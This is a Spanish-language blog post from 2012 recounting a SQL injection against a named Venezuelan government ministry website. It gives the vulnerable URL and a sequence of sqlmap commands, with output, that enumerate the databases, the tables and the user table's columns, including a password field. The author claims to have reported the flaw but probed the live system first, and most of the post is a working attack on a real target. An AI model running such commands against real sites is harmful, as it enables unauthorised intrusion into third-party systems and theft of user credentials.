martes, 12 de junio de 2012

SQL Injection Ministerio del Poder - Gobierno de Venezuela


Hace días, un amigo de Venezuela, me comento sobre algunas paginas webs "importantes" de su País, dentro de las paginas webs que me comento, vi una del Ministerio del Gobierno Bolivariano de Venezuela; la cual de inmediato empece a "dorkear" para ver que tan segura era y pues como ya es un clásico las vulnerabilidades en los sitios webs gubernamentales, me tope fácilmente con una SQL.

Al momento que encontré dicho SQL, lo primero que hice fue tratar de reportar el bug, pero antes de eso quize ver un poco mas a fondo lo que tenia dicha web, veamos un poco.



Sitio Web: http://www.fonep.gob.ve
Link Vulnerable: http://www.fonep.gob.ve/noticias.php?id=195

Explotando la vulnerabilidad con SQLMAP:

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 --dbs
available databases [2]:
[*] information_schema
[*] penof_cms


./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms --tables
Database: penof_cms
[20 tables]
+-------------------+
| fonep_cargos      |
| fonep_ciudades    |
| fonep_contacto    |
| fonep_contenido   |
| fonep_contratista |
| fonep_documentos  |
| fonep_ds          |
| fonep_empleo      |
| fonep_enlaces     |
| fonep_errores     |
| fonep_estados     |
| fonep_extras      |
| fonep_log         |
| fonep_media       |
| fonep_rextras     |
| fonep_rsecciones  |
| fonep_rtagcloud   |
| fonep_secciones   |
| fonep_tagcloud    |
| fonep_usuarios    |
+-------------------+

./sqlmap.py -u http://www.fonep.gob.ve/noticias.php?id=195 -D penof_cms -T fonep_usuarios --columns
Database: penof_cms
Table: fonep_usuarios
[9 columns]
+-----------------------+-----------------+
| Column                | Type            |
+-----------------------+-----------------+
| apellido_usuarios     | varchar(45)     |
| clave_usuarios        | varchar(40)     |
| email_usuarios        | varchar(255)    |
| id_usuarios           | int(2) unsigned |
| institucion_usuarios  | varchar(45)     |
| nombre_usuarios       | varchar(45)     |
| permisos_usuarios     | tinyint(4)      |
| telf_usuarios         | int(11)         |
| ultimoacceso_usuarios | datetime        |
+-----------------------+-----------------+

Bueno, como podemos apreciar, tenemos datos importantes del sitio web, esto se debería de tomar como un ejemplo de la vulnerabilidad, mas no para usarlo fines lucrativos.

La vulnerabilidad ha sido respectivamente reportada, ojala sea parcheado lo mas pronto posible.

Saludos.




No hay comentarios:

Publicar un comentario en la entrada